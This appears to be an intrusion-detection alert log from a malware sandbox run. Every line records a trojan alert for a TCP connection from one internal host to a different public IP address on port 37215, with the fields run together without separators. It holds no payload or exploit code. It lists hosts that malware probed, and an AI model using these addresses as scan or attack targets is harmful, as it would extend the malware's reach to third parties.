              2024-10-12T23:05:38.845570+020028352221A Network Trojan was detected192.168.2.1439686197.198.79.14137215TCP
              2024-10-12T23:05:38.847273+020028352221A Network Trojan was detected192.168.2.1456464197.138.145.12237215TCP
              2024-10-12T23:05:38.847288+020028352221A Network Trojan was detected192.168.2.1458642197.190.36.10337215TCP
              2024-10-12T23:05:38.851190+020028352221A Network Trojan was detected192.168.2.1442316197.1.20.22037215TCP
              2024-10-12T23:05:38.851430+020028352221A Network Trojan was detected192.168.2.1435640197.234.181.16237215TCP
              2024-10-12T23:05:38.851487+020028352221A Network Trojan was detected192.168.2.1449782197.120.124.12037215TCP
              2024-10-12T23:05:38.861079+020028352221A Network Trojan was detected192.168.2.1454512156.146.214.5137215TCP
              2024-10-12T23:05:38.893230+020028352221A Network Trojan was detected192.168.2.1452856197.11.143.1037215TCP
              2024-10-12T23:05:38.908134+020028352221A Network Trojan was detected192.168.2.1444286197.136.100.17137215TCP
              2024-10-12T23:05:38.909650+020028352221A Network Trojan was detected192.168.2.1446370197.58.223.22537215TCP
              2024-10-12T23:05:39.285995+020028352221A Network Trojan was detected192.168.2.1443452156.224.156.8437215TCP
              2024-10-12T23:05:39.876966+020028352221A Network Trojan was detected192.168.2.1436622156.109.4.10237215TCP
              2024-10-12T23:05:39.878620+020028352221A Network Trojan was detected192.168.2.1448360156.174.4.6437215TCP
              2024-10-12T23:05:39.911235+020028352221A Network Trojan was detected192.168.2.1457670197.245.145.16837215TCP
              2024-10-12T23:05:39.911253+020028352221A Network Trojan was detected192.168.2.1442016197.173.244.4137215TCP
              2024-10-12T23:05:39.911437+020028352221A Network Trojan was detected192.168.2.1446194197.215.19.1537215TCP
              2024-10-12T23:05:39.911451+020028352221A Network Trojan was detected192.168.2.1436998197.226.83.7537215TCP
              2024-10-12T23:05:39.911541+020028352221A Network Trojan was detected192.168.2.1445372197.188.80.12937215TCP
              2024-10-12T23:05:39.911547+020028352221A Network Trojan was detected192.168.2.1451458197.75.82.20337215TCP
              2024-10-12T23:05:40.876714+020028352221A Network Trojan was detected192.168.2.1448318197.108.145.9537215TCP
              2024-10-12T23:05:40.876829+020028352221A Network Trojan was detected192.168.2.1448498197.171.250.17037215TCP
              2024-10-12T23:05:40.876886+020028352221A Network Trojan was detected192.168.2.1443078197.116.247.18937215TCP
              2024-10-12T23:05:40.877014+020028352221A Network Trojan was detected192.168.2.1440770197.125.193.4237215TCP
              2024-10-12T23:05:40.877294+020028352221A Network Trojan was detected192.168.2.1457306197.93.150.13137215TCP
              2024-10-12T23:05:40.877406+020028352221A Network Trojan was detected192.168.2.1444644197.157.112.13037215TCP
              2024-10-12T23:05:40.877507+020028352221A Network Trojan was detected192.168.2.1436466197.145.154.20837215TCP
              2024-10-12T23:05:40.877684+020028352221A Network Trojan was detected192.168.2.1451644197.162.72.8037215TCP
              2024-10-12T23:05:40.877722+020028352221A Network Trojan was detected192.168.2.1445978197.217.208.11137215TCP
              2024-10-12T23:05:40.877765+020028352221A Network Trojan was detected192.168.2.1442708197.44.238.16037215TCP
              2024-10-12T23:05:40.877787+020028352221A Network Trojan was detected192.168.2.1434382197.229.109.12637215TCP
              2024-10-12T23:05:40.877892+020028352221A Network Trojan was detected192.168.2.1435784197.168.70.4437215TCP
              2024-10-12T23:05:40.878008+020028352221A Network Trojan was detected192.168.2.1454342197.98.154.17237215TCP
              2024-10-12T23:05:40.878096+020028352221A Network Trojan was detected192.168.2.1460720197.138.105.1337215TCP
              2024-10-12T23:05:40.878455+020028352221A Network Trojan was detected192.168.2.1460924197.17.90.5537215TCP
              2024-10-12T23:05:40.878697+020028352221A Network Trojan was detected192.168.2.1436954197.156.16.25137215TCP
              2024-10-12T23:05:40.878730+020028352221A Network Trojan was detected192.168.2.1455894197.185.139.9037215TCP
              2024-10-12T23:05:40.878863+020028352221A Network Trojan was detected192.168.2.1454838197.79.8.20037215TCP
              2024-10-12T23:05:40.879010+020028352221A Network Trojan was detected192.168.2.1448250197.77.83.9737215TCP
              2024-10-12T23:05:40.879181+020028352221A Network Trojan was detected192.168.2.1449888197.203.247.20137215TCP
              2024-10-12T23:05:40.879211+020028352221A Network Trojan was detected192.168.2.1444390197.20.244.2237215TCP
              2024-10-12T23:05:40.879397+020028352221A Network Trojan was detected192.168.2.1457002197.134.70.037215TCP
              2024-10-12T23:05:40.879715+020028352221A Network Trojan was detected192.168.2.1457994197.43.240.537215TCP
              2024-10-12T23:05:40.879790+020028352221A Network Trojan was detected192.168.2.1448724197.54.6.137215TCP
              2024-10-12T23:05:40.879904+020028352221A Network Trojan was detected192.168.2.1433040197.86.63.18237215TCP
              2024-10-12T23:05:40.880402+020028352221A Network Trojan was detected192.168.2.1437194197.23.124.11537215TCP
              2024-10-12T23:05:40.880956+020028352221A Network Trojan was detected192.168.2.1457728197.193.103.25037215TCP
              2024-10-12T23:05:40.881061+020028352221A Network Trojan was detected192.168.2.1452254197.143.22.25337215TCP
              2024-10-12T23:05:40.881906+020028352221A Network Trojan was detected192.168.2.1448968197.216.251.12537215TCP
              2024-10-12T23:05:40.882035+020028352221A Network Trojan was detected192.168.2.1440954197.86.248.2737215TCP
              2024-10-12T23:05:40.882170+020028352221A Network Trojan was detected192.168.2.1442358197.62.163.19537215TCP
              2024-10-12T23:05:40.882651+020028352221A Network Trojan was detected192.168.2.1440548197.49.94.21837215TCP
              2024-10-12T23:05:40.883367+020028352221A Network Trojan was detected192.168.2.1450322197.21.15.13337215TCP
              2024-10-12T23:05:40.893045+020028352221A Network Trojan was detected192.168.2.1450362197.16.13.8837215TCP
              2024-10-12T23:05:41.336558+020028352221A Network Trojan was detected192.168.2.1441342156.224.213.22637215TCP
              2024-10-12T23:05:41.877069+020028352221A Network Trojan was detected192.168.2.1451162197.14.19.16137215TCP
              2024-10-12T23:05:41.924214+020028352221A Network Trojan was detected192.168.2.1447412197.31.148.14737215TCP
              2024-10-12T23:05:41.940955+020028352221A Network Trojan was detected192.168.2.1434488197.136.3.15637215TCP
              2024-10-12T23:05:41.943067+020028352221A Network Trojan was detected192.168.2.1451630156.36.118.22937215TCP
              2024-10-12T23:05:41.959709+020028352221A Network Trojan was detected192.168.2.1451720156.223.241.3537215TCP
              2024-10-12T23:05:41.959800+020028352221A Network Trojan was detected192.168.2.1437294156.6.176.6837215TCP
              2024-10-12T23:05:43.900510+020028352221A Network Trojan was detected192.168.2.1454052197.234.0.14737215TCP
              2024-10-12T23:05:43.910838+020028352221A Network Trojan was detected192.168.2.1432992197.250.103.1837215TCP
              2024-10-12T23:05:43.940026+020028352221A Network Trojan was detected192.168.2.1454624197.124.247.13537215TCP
              2024-10-12T23:05:43.976154+020028352221A Network Trojan was detected192.168.2.1458804197.15.173.737215TCP
              2024-10-12T23:05:43.986347+020028352221A Network Trojan was detected192.168.2.1441064197.213.122.2937215TCP
              2024-10-12T23:05:43.991128+020028352221A Network Trojan was detected192.168.2.1459228197.93.247.9237215TCP
              2024-10-12T23:05:43.992857+020028352221A Network Trojan was detected192.168.2.1437726197.108.197.24837215TCP
              2024-10-12T23:05:44.800810+020028352221A Network Trojan was detected192.168.2.1435812197.7.152.17337215TCP
              2024-10-12T23:05:44.939490+020028352221A Network Trojan was detected192.168.2.1453968197.204.11.18937215TCP
              2024-10-12T23:05:44.987490+020028352221A Network Trojan was detected192.168.2.1452236197.98.163.23037215TCP
              2024-10-12T23:05:45.570086+020028352221A Network Trojan was detected192.168.2.1438730156.236.156.17737215TCP
              2024-10-12T23:05:46.003018+020028352221A Network Trojan was detected192.168.2.1451638197.144.194.3437215TCP
              2024-10-12T23:05:50.019844+020028352221A Network Trojan was detected192.168.2.1452946156.49.85.10037215TCP
              2024-10-12T23:05:50.035980+020028352221A Network Trojan was detected192.168.2.1453048156.199.190.13937215TCP
              2024-10-12T23:05:50.037517+020028352221A Network Trojan was detected192.168.2.1451158156.8.197.11637215TCP
              2024-10-12T23:05:50.066430+020028352221A Network Trojan was detected192.168.2.1454102197.82.9.8137215TCP
              2024-10-12T23:05:50.066670+020028352221A Network Trojan was detected192.168.2.1458510156.110.73.6837215TCP
              2024-10-12T23:05:50.068572+020028352221A Network Trojan was detected192.168.2.1450150156.116.34.11337215TCP
              2024-10-12T23:05:50.293551+020028352221A Network Trojan was detected192.168.2.1444728156.73.210.1037215TCP
              2024-10-12T23:05:51.017274+020028352221A Network Trojan was detected192.168.2.1454922197.151.67.18037215TCP
              2024-10-12T23:05:51.017603+020028352221A Network Trojan was detected192.168.2.1447938156.2.85.16237215TCP
              2024-10-12T23:05:51.017800+020028352221A Network Trojan was detected192.168.2.1452398156.81.106.17837215TCP
              2024-10-12T23:05:51.017818+020028352221A Network Trojan was detected192.168.2.1448844156.105.239.4837215TCP
              2024-10-12T23:05:51.018226+020028352221A Network Trojan was detected192.168.2.1447278156.11.48.24937215TCP
              2024-10-12T23:05:51.019318+020028352221A Network Trojan was detected192.168.2.1460550156.208.117.18337215TCP
              2024-10-12T23:05:51.019440+020028352221A Network Trojan was detected192.168.2.1445070156.83.246.7937215TCP
              2024-10-12T23:05:51.019500+020028352221A Network Trojan was detected192.168.2.1452472156.229.154.11537215TCP
              2024-10-12T23:05:51.019587+020028352221A Network Trojan was detected192.168.2.1436684156.125.21.19737215TCP
              2024-10-12T23:05:51.019735+020028352221A Network Trojan was detected192.168.2.1438532156.225.41.22137215TCP
              2024-10-12T23:05:51.019819+020028352221A Network Trojan was detected192.168.2.1460254197.85.148.7737215TCP
              2024-10-12T23:05:51.021393+020028352221A Network Trojan was detected192.168.2.1435810156.221.109.19537215TCP
              2024-10-12T23:05:51.033668+020028352221A Network Trojan was detected192.168.2.1442130156.15.174.8037215TCP
              2024-10-12T23:05:51.033823+020028352221A Network Trojan was detected192.168.2.1440352197.233.29.23837215TCP
              2024-10-12T23:05:51.034098+020028352221A Network Trojan was detected192.168.2.1442850156.58.227.24737215TCP
              2024-10-12T23:05:51.034111+020028352221A Network Trojan was detected192.168.2.1454234197.238.252.1637215TCP
              2024-10-12T23:05:51.034264+020028352221A Network Trojan was detected192.168.2.1440876156.251.15.23737215TCP
              2024-10-12T23:05:51.035324+020028352221A Network Trojan was detected192.168.2.1445138156.224.74.6737215TCP
              2024-10-12T23:05:51.035549+020028352221A Network Trojan was detected192.168.2.1458214156.244.161.18937215TCP
              2024-10-12T23:05:51.035649+020028352221A Network Trojan was detected192.168.2.1438542197.46.202.19337215TCP
              2024-10-12T23:05:51.035757+020028352221A Network Trojan was detected192.168.2.1436132197.248.43.23737215TCP
              2024-10-12T23:05:51.036075+020028352221A Network Trojan was detected192.168.2.1447018156.56.135.21137215TCP
              2024-10-12T23:05:51.036149+020028352221A Network Trojan was detected192.168.2.1448346156.53.223.1237215TCP
              2024-10-12T23:05:51.036342+020028352221A Network Trojan was detected192.168.2.1451930156.83.75.1737215TCP
              2024-10-12T23:05:51.036373+020028352221A Network Trojan was detected192.168.2.1444994197.62.163.3937215TCP
              2024-10-12T23:05:51.038116+020028352221A Network Trojan was detected192.168.2.1448898156.78.184.13437215TCP
              2024-10-12T23:05:51.038286+020028352221A Network Trojan was detected192.168.2.1441834156.63.141.937215TCP
              2024-10-12T23:05:51.039036+020028352221A Network Trojan was detected192.168.2.1457368156.12.203.6437215TCP
              2024-10-12T23:05:51.039275+020028352221A Network Trojan was detected192.168.2.1449140197.194.154.3637215TCP
              2024-10-12T23:05:51.039373+020028352221A Network Trojan was detected192.168.2.1459574156.74.114.23737215TCP
              2024-10-12T23:05:51.039736+020028352221A Network Trojan was detected192.168.2.1441864156.3.164.16837215TCP
              2024-10-12T23:05:51.064707+020028352221A Network Trojan was detected192.168.2.1438216197.195.216.9737215TCP
              2024-10-12T23:05:51.068557+020028352221A Network Trojan was detected192.168.2.1445458197.140.85.13937215TCP
              2024-10-12T23:05:51.079492+020028352221A Network Trojan was detected192.168.2.1460710197.216.80.9537215TCP
              2024-10-12T23:05:51.081821+020028352221A Network Trojan was detected192.168.2.1455660197.142.70.9137215TCP
              2024-10-12T23:05:52.158617+020028352221A Network Trojan was detected192.168.2.1436988197.243.178.14237215TCP
              2024-10-12T23:05:52.160013+020028352221A Network Trojan was detected192.168.2.1458554197.206.136.1437215TCP
              2024-10-12T23:05:52.173445+020028352221A Network Trojan was detected192.168.2.1451276197.236.217.6937215TCP
              2024-10-12T23:05:52.173540+020028352221A Network Trojan was detected192.168.2.1458764197.213.31.12937215TCP
              2024-10-12T23:05:52.173624+020028352221A Network Trojan was detected192.168.2.1455030197.50.157.19037215TCP
              2024-10-12T23:05:52.173778+020028352221A Network Trojan was detected192.168.2.1449450197.169.64.16937215TCP
              2024-10-12T23:05:52.174741+020028352221A Network Trojan was detected192.168.2.1457482197.196.21.20237215TCP
              2024-10-12T23:05:52.175499+020028352221A Network Trojan was detected192.168.2.1436388197.144.32.18037215TCP
              2024-10-12T23:05:52.175588+020028352221A Network Trojan was detected192.168.2.1438066197.193.172.6037215TCP
              2024-10-12T23:05:52.188910+020028352221A Network Trojan was detected192.168.2.1447310197.24.140.19437215TCP
              2024-10-12T23:05:52.189309+020028352221A Network Trojan was detected192.168.2.1436238197.3.93.10337215TCP
              2024-10-12T23:05:52.189327+020028352221A Network Trojan was detected192.168.2.1438470197.52.65.11437215TCP
              2024-10-12T23:05:52.189398+020028352221A Network Trojan was detected192.168.2.1435470197.152.177.5037215TCP
              2024-10-12T23:05:52.189488+020028352221A Network Trojan was detected192.168.2.1446156197.119.125.22437215TCP
              2024-10-12T23:05:52.189882+020028352221A Network Trojan was detected192.168.2.1442570197.29.196.22137215TCP
              2024-10-12T23:05:52.190180+020028352221A Network Trojan was detected192.168.2.1448410197.81.129.20737215TCP
              2024-10-12T23:05:52.190416+020028352221A Network Trojan was detected192.168.2.1432930197.114.42.5837215TCP
              2024-10-12T23:05:52.191136+020028352221A Network Trojan was detected192.168.2.1435896197.217.136.6737215TCP
              2024-10-12T23:05:52.191641+020028352221A Network Trojan was detected192.168.2.1443252197.96.200.21637215TCP
              2024-10-12T23:05:52.191687+020028352221A Network Trojan was detected192.168.2.1454408197.208.214.4537215TCP
              2024-10-12T23:05:52.192153+020028352221A Network Trojan was detected192.168.2.1441230197.19.182.11937215TCP
              2024-10-12T23:05:52.192175+020028352221A Network Trojan was detected192.168.2.1440042197.81.65.9737215TCP
              2024-10-12T23:05:52.192195+020028352221A Network Trojan was detected192.168.2.1451716197.144.169.10437215TCP
              2024-10-12T23:05:52.193266+020028352221A Network Trojan was detected192.168.2.1441928197.160.149.6137215TCP
              2024-10-12T23:05:52.193441+020028352221A Network Trojan was detected192.168.2.1440184197.186.196.21737215TCP
              2024-10-12T23:05:52.193733+020028352221A Network Trojan was detected192.168.2.1453952197.70.191.7037215TCP
              2024-10-12T23:05:52.193804+020028352221A Network Trojan was detected192.168.2.1451488197.233.38.8337215TCP
              2024-10-12T23:05:52.193867+020028352221A Network Trojan was detected192.168.2.1458526197.190.205.13937215TCP
              2024-10-12T23:05:52.194057+020028352221A Network Trojan was detected192.168.2.1436828197.87.227.14837215TCP
              2024-10-12T23:05:52.194104+020028352221A Network Trojan was detected192.168.2.1441196197.30.23.12637215TCP
              2024-10-12T23:05:52.194565+020028352221A Network Trojan was detected192.168.2.1434004197.59.226.19037215TCP
              2024-10-12T23:05:52.194664+020028352221A Network Trojan was detected192.168.2.1460802197.159.243.25537215TCP
              2024-10-12T23:05:52.195496+020028352221A Network Trojan was detected192.168.2.1442344197.168.176.10237215TCP
              2024-10-12T23:05:52.195612+020028352221A Network Trojan was detected192.168.2.1449424197.135.228.12137215TCP
              2024-10-12T23:05:52.195666+020028352221A Network Trojan was detected192.168.2.1454410197.247.123.337215TCP
              2024-10-12T23:05:52.195729+020028352221A Network Trojan was detected192.168.2.1433112197.37.210.14737215TCP
              2024-10-12T23:05:52.196124+020028352221A Network Trojan was detected192.168.2.1437998197.85.239.4037215TCP
              2024-10-12T23:05:52.226676+020028352221A Network Trojan was detected192.168.2.1443728197.77.37.1237215TCP
              2024-10-12T23:05:53.053634+020028352221A Network Trojan was detected192.168.2.1435798156.149.49.7137215TCP
              2024-10-12T23:05:53.065791+020028352221A Network Trojan was detected192.168.2.1457852156.221.81.5037215TCP
              2024-10-12T23:05:53.065833+020028352221A Network Trojan was detected192.168.2.1435706156.34.255.25437215TCP
              2024-10-12T23:05:53.065895+020028352221A Network Trojan was detected192.168.2.1455462156.216.34.7837215TCP
              2024-10-12T23:05:53.066532+020028352221A Network Trojan was detected192.168.2.1448758156.32.17.25537215TCP
              2024-10-12T23:05:53.066721+020028352221A Network Trojan was detected192.168.2.1445910156.188.107.4337215TCP
              2024-10-12T23:05:53.066839+020028352221A Network Trojan was detected192.168.2.1452338156.130.250.25437215TCP
              2024-10-12T23:05:53.067491+020028352221A Network Trojan was detected192.168.2.1449398156.70.17.14337215TCP
              2024-10-12T23:05:53.068089+020028352221A Network Trojan was detected192.168.2.1441266156.27.212.1137215TCP
              2024-10-12T23:05:53.068259+020028352221A Network Trojan was detected192.168.2.1454208156.233.75.18937215TCP
              2024-10-12T23:05:53.068628+020028352221A Network Trojan was detected192.168.2.1434596156.11.77.8837215TCP
              2024-10-12T23:05:53.068874+020028352221A Network Trojan was detected192.168.2.1448854156.106.152.6537215TCP
              2024-10-12T23:05:53.070935+020028352221A Network Trojan was detected192.168.2.1445424156.52.4.8937215TCP
              2024-10-12T23:05:53.080685+020028352221A Network Trojan was detected192.168.2.1447892156.36.203.20137215TCP
              2024-10-12T23:05:53.081164+020028352221A Network Trojan was detected192.168.2.1450516156.155.35.13037215TCP
              2024-10-12T23:05:53.081634+020028352221A Network Trojan was detected192.168.2.1450180156.196.106.3937215TCP
              2024-10-12T23:05:53.081692+020028352221A Network Trojan was detected192.168.2.1445014156.107.73.12737215TCP
              2024-10-12T23:05:53.081848+020028352221A Network Trojan was detected192.168.2.1456432156.178.253.12337215TCP
              2024-10-12T23:05:53.084574+020028352221A Network Trojan was detected192.168.2.1440098156.219.114.6737215TCP
              2024-10-12T23:05:53.085790+020028352221A Network Trojan was detected192.168.2.1438722156.13.72.537215TCP
              2024-10-12T23:05:53.085912+020028352221A Network Trojan was detected192.168.2.1442360156.41.213.20337215TCP
              2024-10-12T23:05:53.097108+020028352221A Network Trojan was detected192.168.2.1456348156.166.58.17637215TCP
              2024-10-12T23:05:53.097400+020028352221A Network Trojan was detected192.168.2.1442934197.172.204.10337215TCP
              2024-10-12T23:05:53.097920+020028352221A Network Trojan was detected192.168.2.1445080156.44.17.6737215TCP
              2024-10-12T23:05:53.100022+020028352221A Network Trojan was detected192.168.2.1444244156.55.123.5637215TCP
              2024-10-12T23:05:53.100063+020028352221A Network Trojan was detected192.168.2.1456084156.216.127.20037215TCP
              2024-10-12T23:05:53.100194+020028352221A Network Trojan was detected192.168.2.1457558156.252.147.5237215TCP
              2024-10-12T23:05:53.188942+020028352221A Network Trojan was detected192.168.2.1443108197.225.239.13737215TCP
              2024-10-12T23:05:53.189308+020028352221A Network Trojan was detected192.168.2.1434224197.151.205.1037215TCP
              2024-10-12T23:05:53.253981+020028352221A Network Trojan was detected192.168.2.1433464197.185.13.21237215TCP
              2024-10-12T23:05:53.386156+020028352221A Network Trojan was detected192.168.2.1435728156.73.226.19237215TCP
              2024-10-12T23:05:54.111398+020028352221A Network Trojan was detected192.168.2.1450968197.222.199.15237215TCP
              2024-10-12T23:05:54.111434+020028352221A Network Trojan was detected192.168.2.1459202197.75.197.16737215TCP
              2024-10-12T23:05:54.113157+020028352221A Network Trojan was detected192.168.2.1432926197.225.52.537215TCP
              2024-10-12T23:05:55.074040+020028352221A Network Trojan was detected192.168.2.1446662197.11.155.12837215TCP
              2024-10-12T23:05:55.158388+020028352221A Network Trojan was detected192.168.2.1447252197.43.24.3237215TCP
              2024-10-12T23:05:55.158510+020028352221A Network Trojan was detected192.168.2.1439942197.247.168.10437215TCP
              2024-10-12T23:05:55.159996+020028352221A Network Trojan was detected192.168.2.1439000197.54.42.13037215TCP
              2024-10-12T23:05:55.191351+020028352221A Network Trojan was detected192.168.2.1443402197.125.221.137215TCP
              2024-10-12T23:05:55.195492+020028352221A Network Trojan was detected192.168.2.1447220197.157.255.12937215TCP
              2024-10-12T23:05:55.236543+020028352221A Network Trojan was detected192.168.2.1447298197.50.169.14037215TCP
              2024-10-12T23:05:55.236582+020028352221A Network Trojan was detected192.168.2.1458742197.75.103.3637215TCP
              2024-10-12T23:05:55.257181+020028352221A Network Trojan was detected192.168.2.1441596197.201.134.7837215TCP
              2024-10-12T23:05:55.257309+020028352221A Network Trojan was detected192.168.2.1448734197.199.12.18737215TCP
              2024-10-12T23:05:55.257478+020028352221A Network Trojan was detected192.168.2.1457594197.253.6.6437215TCP
              2024-10-12T23:05:55.271616+020028352221A Network Trojan was detected192.168.2.1458230197.120.52.20637215TCP
              2024-10-12T23:05:56.033511+020028352221A Network Trojan was detected192.168.2.1446164156.250.15.9737215TCP
              2024-10-12T23:05:56.096583+020028352221A Network Trojan was detected192.168.2.1439272197.125.52.17137215TCP
              2024-10-12T23:05:56.098376+020028352221A Network Trojan was detected192.168.2.1449010197.250.196.7037215TCP
              2024-10-12T23:05:56.111070+020028352221A Network Trojan was detected192.168.2.1434442197.240.241.21337215TCP
              2024-10-12T23:05:56.111239+020028352221A Network Trojan was detected192.168.2.1447204197.247.189.16137215TCP
              2024-10-12T23:05:56.111338+020028352221A Network Trojan was detected192.168.2.1452196197.124.63.10037215TCP
              2024-10-12T23:05:56.113076+020028352221A Network Trojan was detected192.168.2.1448136197.83.60.737215TCP
              2024-10-12T23:05:56.113121+020028352221A Network Trojan was detected192.168.2.1440134197.212.231.24737215TCP
              2024-10-12T23:05:56.115359+020028352221A Network Trojan was detected192.168.2.1439108197.119.27.23637215TCP
              2024-10-12T23:05:56.160529+020028352221A Network Trojan was detected192.168.2.1443662197.197.177.7637215TCP
              2024-10-12T23:05:56.190122+020028352221A Network Trojan was detected192.168.2.1438632197.28.111.6937215TCP
              2024-10-12T23:05:56.236620+020028352221A Network Trojan was detected192.168.2.1442816197.188.113.21737215TCP
              2024-10-12T23:05:56.285188+020028352221A Network Trojan was detected192.168.2.1446096197.247.52.2637215TCP
              2024-10-12T23:05:57.127203+020028352221A Network Trojan was detected192.168.2.1446508197.246.239.20837215TCP
              2024-10-12T23:05:57.127394+020028352221A Network Trojan was detected192.168.2.1436960197.113.80.18537215TCP
              2024-10-12T23:05:57.127442+020028352221A Network Trojan was detected192.168.2.1446138197.121.138.5637215TCP
              2024-10-12T23:05:57.128707+020028352221A Network Trojan was detected192.168.2.1456780197.22.182.12137215TCP
              2024-10-12T23:05:57.128907+020028352221A Network Trojan was detected192.168.2.1453530197.71.85.7137215TCP
              2024-10-12T23:05:57.142822+020028352221A Network Trojan was detected192.168.2.1433280197.22.66.13837215TCP
              2024-10-12T23:05:57.142980+020028352221A Network Trojan was detected192.168.2.1448504197.48.131.20537215TCP
              2024-10-12T23:05:57.144236+020028352221A Network Trojan was detected192.168.2.1452340197.243.100.22737215TCP
              2024-10-12T23:05:57.144406+020028352221A Network Trojan was detected192.168.2.1443032197.239.178.19437215TCP
              2024-10-12T23:05:57.144473+020028352221A Network Trojan was detected192.168.2.1446682197.74.19.18837215TCP
              2024-10-12T23:05:57.146429+020028352221A Network Trojan was detected192.168.2.1436080197.182.237.14437215TCP
              2024-10-12T23:05:57.158324+020028352221A Network Trojan was detected192.168.2.1447134156.72.205.22137215TCP
              2024-10-12T23:05:57.173740+020028352221A Network Trojan was detected192.168.2.1449062156.195.225.18837215TCP
              2024-10-12T23:05:58.173324+020028352221A Network Trojan was detected192.168.2.1435552156.192.232.3037215TCP
              2024-10-12T23:05:58.173715+020028352221A Network Trojan was detected192.168.2.1445906156.143.154.21437215TCP
              2024-10-12T23:05:58.174545+020028352221A Network Trojan was detected192.168.2.1449110156.122.58.6337215TCP
              2024-10-12T23:05:58.189514+020028352221A Network Trojan was detected192.168.2.1437154197.181.209.21937215TCP
              2024-10-12T23:05:58.189831+020028352221A Network Trojan was detected192.168.2.1457704156.25.222.20937215TCP
              2024-10-12T23:05:58.189838+020028352221A Network Trojan was detected192.168.2.1437722156.248.89.7137215TCP
              2024-10-12T23:05:58.191506+020028352221A Network Trojan was detected192.168.2.1457968156.55.23.17137215TCP
              2024-10-12T23:05:58.191508+020028352221A Network Trojan was detected192.168.2.1436152197.183.178.2837215TCP
              2024-10-12T23:05:58.193405+020028352221A Network Trojan was detected192.168.2.1440222156.211.158.22037215TCP
              2024-10-12T23:05:58.193720+020028352221A Network Trojan was detected192.168.2.1452422156.19.189.6737215TCP
              2024-10-12T23:05:58.193895+020028352221A Network Trojan was detected192.168.2.1458392156.38.245.23537215TCP
              2024-10-12T23:05:58.195228+020028352221A Network Trojan was detected192.168.2.1443706156.112.8.10437215TCP
              2024-10-12T23:05:58.221019+020028352221A Network Trojan was detected192.168.2.1457036197.71.220.13137215TCP
              2024-10-12T23:05:58.304793+020028352221A Network Trojan was detected192.168.2.1453856197.199.166.18937215TCP
              2024-10-12T23:05:59.190387+020028352221A Network Trojan was detected192.168.2.1444168197.89.11.8137215TCP
              2024-10-12T23:05:59.204859+020028352221A Network Trojan was detected192.168.2.1435138197.131.137.1437215TCP
              2024-10-12T23:05:59.205199+020028352221A Network Trojan was detected192.168.2.1442814197.210.22.10437215TCP
              2024-10-12T23:05:59.221903+020028352221A Network Trojan was detected192.168.2.1454462197.17.85.23537215TCP
              2024-10-12T23:05:59.222813+020028352221A Network Trojan was detected192.168.2.1437792197.50.255.20837215TCP
              2024-10-12T23:05:59.223071+020028352221A Network Trojan was detected192.168.2.1450280197.111.167.7337215TCP
              2024-10-12T23:05:59.224804+020028352221A Network Trojan was detected192.168.2.1452722197.108.4.19337215TCP
              2024-10-12T23:05:59.236876+020028352221A Network Trojan was detected192.168.2.1441864197.199.6.23037215TCP
              2024-10-12T23:05:59.237255+020028352221A Network Trojan was detected192.168.2.1442602156.46.13.4337215TCP
              2024-10-12T23:05:59.240418+020028352221A Network Trojan was detected192.168.2.1445042197.155.83.21137215TCP
              2024-10-12T23:05:59.240486+020028352221A Network Trojan was detected192.168.2.1445954197.1.237.6837215TCP
              2024-10-12T23:05:59.240598+020028352221A Network Trojan was detected192.168.2.1459806156.95.160.19237215TCP
              2024-10-12T23:05:59.262998+020028352221A Network Trojan was detected192.168.2.1460636197.160.178.337215TCP
              2024-10-12T23:05:59.263493+020028352221A Network Trojan was detected192.168.2.1454286197.159.173.15837215TCP
              2024-10-12T23:05:59.269893+020028352221A Network Trojan was detected192.168.2.1437830156.165.144.17237215TCP
              2024-10-12T23:06:00.023764+020028352221A Network Trojan was detected192.168.2.1438012197.147.65.13537215TCP
              2024-10-12T23:06:00.221091+020028352221A Network Trojan was detected192.168.2.1437200156.80.32.6137215TCP
              2024-10-12T23:06:00.236063+020028352221A Network Trojan was detected192.168.2.1435218156.75.207.1737215TCP
              2024-10-12T23:06:00.236253+020028352221A Network Trojan was detected192.168.2.1434488156.241.0.2437215TCP
              2024-10-12T23:06:00.236439+020028352221A Network Trojan was detected192.168.2.1457910156.251.9.4537215TCP
              2024-10-12T23:06:00.236504+020028352221A Network Trojan was detected192.168.2.1446774156.111.4.25237215TCP
              2024-10-12T23:06:00.238180+020028352221A Network Trojan was detected192.168.2.1459034156.30.208.19537215TCP
              2024-10-12T23:06:00.238282+020028352221A Network Trojan was detected192.168.2.1438222156.38.49.19937215TCP
              2024-10-12T23:06:00.256536+020028352221A Network Trojan was detected192.168.2.1442332156.107.140.23737215TCP
              2024-10-12T23:06:00.256570+020028352221A Network Trojan was detected192.168.2.1452114156.142.111.18437215TCP
              2024-10-12T23:06:00.257973+020028352221A Network Trojan was detected192.168.2.1447640156.104.72.17137215TCP
              2024-10-12T23:06:00.258074+020028352221A Network Trojan was detected192.168.2.1448618156.84.169.6437215TCP
              2024-10-12T23:06:00.258713+020028352221A Network Trojan was detected192.168.2.1452588156.99.115.22537215TCP
              2024-10-12T23:06:00.285366+020028352221A Network Trojan was detected192.168.2.1457912197.64.43.13437215TCP
              2024-10-12T23:06:00.299893+020028352221A Network Trojan was detected192.168.2.1454326197.122.73.15637215TCP
              2024-10-12T23:06:00.375534+020028352221A Network Trojan was detected192.168.2.1436628197.147.111.16437215TCP
              2024-10-12T23:06:01.270450+020028352221A Network Trojan was detected192.168.2.1455648197.100.197.737215TCP
              2024-10-12T23:06:01.270519+020028352221A Network Trojan was detected192.168.2.1436666197.187.105.23337215TCP
              2024-10-12T23:06:01.273347+020028352221A Network Trojan was detected192.168.2.1448550197.190.55.14237215TCP
              2024-10-12T23:06:01.286531+020028352221A Network Trojan was detected192.168.2.1438420197.40.210.24137215TCP
              2024-10-12T23:06:01.287734+020028352221A Network Trojan was detected192.168.2.1437850197.54.141.8137215TCP
              2024-10-12T23:06:01.288137+020028352221A Network Trojan was detected192.168.2.1458238197.163.232.22337215TCP
              2024-10-12T23:06:01.289002+020028352221A Network Trojan was detected192.168.2.1454092197.202.62.20937215TCP
              2024-10-12T23:06:01.289027+020028352221A Network Trojan was detected192.168.2.1439644156.136.29.4637215TCP
              2024-10-12T23:06:01.300898+020028352221A Network Trojan was detected192.168.2.1453614197.97.224.19037215TCP
              2024-10-12T23:06:02.267346+020028352221A Network Trojan was detected192.168.2.1441004156.177.113.737215TCP
              2024-10-12T23:06:02.267678+020028352221A Network Trojan was detected192.168.2.1440784156.226.225.737215TCP
              2024-10-12T23:06:02.267909+020028352221A Network Trojan was detected192.168.2.1452402156.24.23.2737215TCP
              2024-10-12T23:06:02.268183+020028352221A Network Trojan was detected192.168.2.1436436156.225.152.25337215TCP
              2024-10-12T23:06:02.283007+020028352221A Network Trojan was detected192.168.2.1457820156.248.111.4637215TCP
